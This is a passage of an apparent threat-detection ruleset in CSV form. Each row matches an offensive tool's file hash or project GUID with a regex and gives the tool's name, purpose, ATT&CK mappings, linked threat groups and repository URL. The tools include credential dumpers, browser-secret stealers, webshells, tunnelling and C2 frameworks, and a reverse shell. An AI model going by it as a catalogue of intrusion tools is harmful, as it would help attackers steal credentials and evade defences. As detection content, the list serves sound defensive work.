"*158b4c36722770abd1f8732a19fd32a61d7892dc0fde6ab220adfacaff5628e8*",".{0,1000}158b4c36722770abd1f8732a19fd32a61d7892dc0fde6ab220adfacaff5628e8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22265"
"*158c0b33376d319848cffd69f20dc6e2dc93aa66ed71dffd6f0ee3803da70dd2*",".{0,1000}158c0b33376d319848cffd69f20dc6e2dc93aa66ed71dffd6f0ee3803da70dd2.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","0","#filehash","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","22266"
"*1594d2cb2fc051ab4dd77d0f6ec318f25f1430af50fdef934e3e996fbb91d42f*",".{0,1000}1594d2cb2fc051ab4dd77d0f6ec318f25f1430af50fdef934e3e996fbb91d42f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22268"
"*159766fade72711fc8b28004ec1f2088bb837852029f1e79446d728728c235ef*",".{0,1000}159766fade72711fc8b28004ec1f2088bb837852029f1e79446d728728c235ef.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","#filehash","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","22270"
"*15a1788abea29f55f817e7b9e19fe006fbfac0d5b6ff038b638c4a51f4e08d47*",".{0,1000}15a1788abea29f55f817e7b9e19fe006fbfac0d5b6ff038b638c4a51f4e08d47.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22271"
"*15a2171b1424a78028131808a24d39d5f5383cfd4540ea360a74f9b7c752933d*",".{0,1000}15a2171b1424a78028131808a24d39d5f5383cfd4540ea360a74f9b7c752933d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","22272"
"*15a22b4600d84490ed569c288896a53aa802a0ed466c8802debde5857fa20881*",".{0,1000}15a22b4600d84490ed569c288896a53aa802a0ed466c8802debde5857fa20881.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22273"
"*15ac2ce4714d343601fd09ceb2182f887d094e7311135bddf50b7059c1ab4a9f*",".{0,1000}15ac2ce4714d343601fd09ceb2182f887d094e7311135bddf50b7059c1ab4a9f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22274"
"*15b508d7f36e8f43dd0a0c5f1dc63d120c0cdbe68cd18247d6ca18a9ce6cf807*",".{0,1000}15b508d7f36e8f43dd0a0c5f1dc63d120c0cdbe68cd18247d6ca18a9ce6cf807.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22276"
"*15bc39581933d59dcdb7a264d149cf9bec398e04d18ab0b52f596861614c37b3*",".{0,1000}15bc39581933d59dcdb7a264d149cf9bec398e04d18ab0b52f596861614c37b3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22277"
"*15bca0052f87e43a6545f34c7f5052853316f6b7f2c178624313b3e1e24c0655*",".{0,1000}15bca0052f87e43a6545f34c7f5052853316f6b7f2c178624313b3e1e24c0655.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22278"
"*15bcc98e54e18078130e5d5e21e2d76a31cf3b06fc9e1d0113878d7645cfcd23*",".{0,1000}15bcc98e54e18078130e5d5e21e2d76a31cf3b06fc9e1d0113878d7645cfcd23.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22279"
"*15bdbbebff7a58257d1cd0ade5d76877259c2b3152508f1b2534a6fcab89cb38*",".{0,1000}15bdbbebff7a58257d1cd0ade5d76877259c2b3152508f1b2534a6fcab89cb38.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","#filehash","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","22280"
"*15c8924d9a1c039c2afaf54c431cda1aa0afd3a2dcf67d88d9cafc3ec89cc21b*",".{0,1000}15c8924d9a1c039c2afaf54c431cda1aa0afd3a2dcf67d88d9cafc3ec89cc21b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","22283"
"*15cb2dd2018c7d8d79752c3165c95ee8e42d70aac398d11dc41e236cbf997595*",".{0,1000}15cb2dd2018c7d8d79752c3165c95ee8e42d70aac398d11dc41e236cbf997595.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22284"
"*15ce9a3c-4609-4184-87b2-e29fc5e2b770*",".{0,1000}15ce9a3c\-4609\-4184\-87b2\-e29fc5e2b770.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","#GUIDproject","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","22285"
"*15d2be7e3c1c5edec59861a2989f2d1df2f77a12d75eedfa997bec5a779f4c39*",".{0,1000}15d2be7e3c1c5edec59861a2989f2d1df2f77a12d75eedfa997bec5a779f4c39.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22286"
"*15e6c7dff42fb507621fddbcbf786ca0022e85ceb431685f607e3d5e07901faa*",".{0,1000}15e6c7dff42fb507621fddbcbf786ca0022e85ceb431685f607e3d5e07901faa.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22288"
"*15fc3df52f81c0f09a430e52a2612d1a999284eeb802c8cec48d135fc3b46414*",".{0,1000}15fc3df52f81c0f09a430e52a2612d1a999284eeb802c8cec48d135fc3b46414.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22291"
"*1605d453-7d62-4198-a436-27e48ef828eb*",".{0,1000}1605d453\-7d62\-4198\-a436\-27e48ef828eb.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#GUIDproject","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","22292"
"*16091e51ca4fcdf374a839ff3b850638918915b5d04c032fffec402286daf4cb*",".{0,1000}16091e51ca4fcdf374a839ff3b850638918915b5d04c032fffec402286daf4cb.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","22294"
"*1610107593861f211a6dc6e886cd8a4ec67bef2ede1072195746462ecb79babd*",".{0,1000}1610107593861f211a6dc6e886cd8a4ec67bef2ede1072195746462ecb79babd.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","22296"
"*161451349be662c5c649be01c670f86b233fb08a1c77c9b720ea08b622d04964*",".{0,1000}161451349be662c5c649be01c670f86b233fb08a1c77c9b720ea08b622d04964.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","22297"
"*1615016050f681f61f692ef54d34a26911587fff98fa6ee1f945f1ecd04e2705*",".{0,1000}1615016050f681f61f692ef54d34a26911587fff98fa6ee1f945f1ecd04e2705.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","#filehash #linux","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","22298"
"*1616ff243a9688f6a5e9bbc73f428ab61d2ab17c9b0c05e92cee43c0589b8315*",".{0,1000}1616ff243a9688f6a5e9bbc73f428ab61d2ab17c9b0c05e92cee43c0589b8315.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22300"
"*1617117C-0E94-4E6A-922C-836D616EC1F5*",".{0,1000}1617117C\-0E94\-4E6A\-922C\-836D616EC1F5.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","22301"
"*1617cf34f5dd98fd31a4c49f522bff51e951a21db40a46f3e7b750f9b600c4e5*",".{0,1000}1617cf34f5dd98fd31a4c49f522bff51e951a21db40a46f3e7b750f9b600c4e5.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","22302"
"*161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6*",".{0,1000}161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22303"
"*162bc32dbc28b62c3a6bcaa33b83f4a99ca60453b229d35d0ae5bc1e80b98673*",".{0,1000}162bc32dbc28b62c3a6bcaa33b83f4a99ca60453b229d35d0ae5bc1e80b98673.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","22306"
"*1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944*",".{0,1000}1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","22308"
"*16323ccc9d39811ba9388ec8121d47246139d82658b85e7a090da15e4cf8bd1b*",".{0,1000}16323ccc9d39811ba9388ec8121d47246139d82658b85e7a090da15e4cf8bd1b.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22309"
"*16337f81bede48a56cba8329bfe3cf02153c96d1e3650112ecdb03f58b25b17d*",".{0,1000}16337f81bede48a56cba8329bfe3cf02153c96d1e3650112ecdb03f58b25b17d.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","22310"
"*16351c63e40c416d311b478ca4442d92fa7a74265ca58332b2a19b0568fb7479*",".{0,1000}16351c63e40c416d311b478ca4442d92fa7a74265ca58332b2a19b0568fb7479.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","22311"
"*163599fee9456a8e2af271824da6e39cfd6aceabb7a62961b8c1a911b94725d6*",".{0,1000}163599fee9456a8e2af271824da6e39cfd6aceabb7a62961b8c1a911b94725d6.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","22312"
"*1636247156ec4ac898c680d8b7897c84153f27ef468e6084229fb86f13cbc598*",".{0,1000}1636247156ec4ac898c680d8b7897c84153f27ef468e6084229fb86f13cbc598.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","22313"
"*1637c5d66df6ce383aee2ab51e305ae9b654cfb4ceb21cf09d5123a54d7d7b7d*",".{0,1000}1637c5d66df6ce383aee2ab51e305ae9b654cfb4ceb21cf09d5123a54d7d7b7d.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","#filehash","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","22315"
"*16386980a156fc6e9219ba230c5fd2759e4b43dff9261487598e7d0ecfe78ae0*",".{0,1000}16386980a156fc6e9219ba230c5fd2759e4b43dff9261487598e7d0ecfe78ae0.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#filehash","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","22316"
"*1642e74e1c5dfd2863c2100b241e1f4897180a5aba2dd7313060c7953b24f105*",".{0,1000}1642e74e1c5dfd2863c2100b241e1f4897180a5aba2dd7313060c7953b24f105.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","22318"
"*164425759daa52e1a44001421120e2f616f08614239f5231be763061c6e56892*",".{0,1000}164425759daa52e1a44001421120e2f616f08614239f5231be763061c6e56892.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22321"
"*16461494c864ffe95bb32a01a8db0aa7d46e9db9d6fa0546fdaf75044eb299fa*",".{0,1000}16461494c864ffe95bb32a01a8db0aa7d46e9db9d6fa0546fdaf75044eb299fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22323"
"*1647b6e9073cee9751e3cd9a031656a6b830355a7a87d15cdc18601ddfa2f327*",".{0,1000}1647b6e9073cee9751e3cd9a031656a6b830355a7a87d15cdc18601ddfa2f327.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","22324"
"*1651b1dcc9a0a8b4cadc099992771c12ddfaadba0007a80d4c501f63890f0d9a*",".{0,1000}1651b1dcc9a0a8b4cadc099992771c12ddfaadba0007a80d4c501f63890f0d9a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22325"
"*1659E645-27B0-4AB9-A10E-64BA4B801CB0*",".{0,1000}1659E645\-27B0\-4AB9\-A10E\-64BA4B801CB0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","22327"
"*165a010438ef6f3b9d8dfbb47e486740e5d8235e77d28efb7b7c1b93654f71b4*",".{0,1000}165a010438ef6f3b9d8dfbb47e486740e5d8235e77d28efb7b7c1b93654f71b4.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","#filehash","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","22328"
"*165cae982b674e1893b733f94c084775ba4881dca16d726c480f924435c70de9*",".{0,1000}165cae982b674e1893b733f94c084775ba4881dca16d726c480f924435c70de9.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22329"
"*165fdaffa2c622e15a709fc597e03c5b8ca2a627cfad12375c81ac65a5c5ad11*",".{0,1000}165fdaffa2c622e15a709fc597e03c5b8ca2a627cfad12375c81ac65a5c5ad11.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22330"
"*166bc58e721deee406eb5b85e40e6201745d6a7379d862d8a202485ab7295dd5*",".{0,1000}166bc58e721deee406eb5b85e40e6201745d6a7379d862d8a202485ab7295dd5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22333"
"*16717cf09d49d252b21c5768092a557ea5a7899d781656da909a7766b6c55074*",".{0,1000}16717cf09d49d252b21c5768092a557ea5a7899d781656da909a7766b6c55074.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#filehash","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","22334"
"*1676f2761aadc0b59145f87fce45d8f27339d8978d015245cbc1c5cfa8c38eda*",".{0,1000}1676f2761aadc0b59145f87fce45d8f27339d8978d015245cbc1c5cfa8c38eda.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22335"
"*167b3dcac59b80e1a0084a8c5aceadc8df796ae35e4fa2dc7c5b7e8eccc22f24*",".{0,1000}167b3dcac59b80e1a0084a8c5aceadc8df796ae35e4fa2dc7c5b7e8eccc22f24.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - 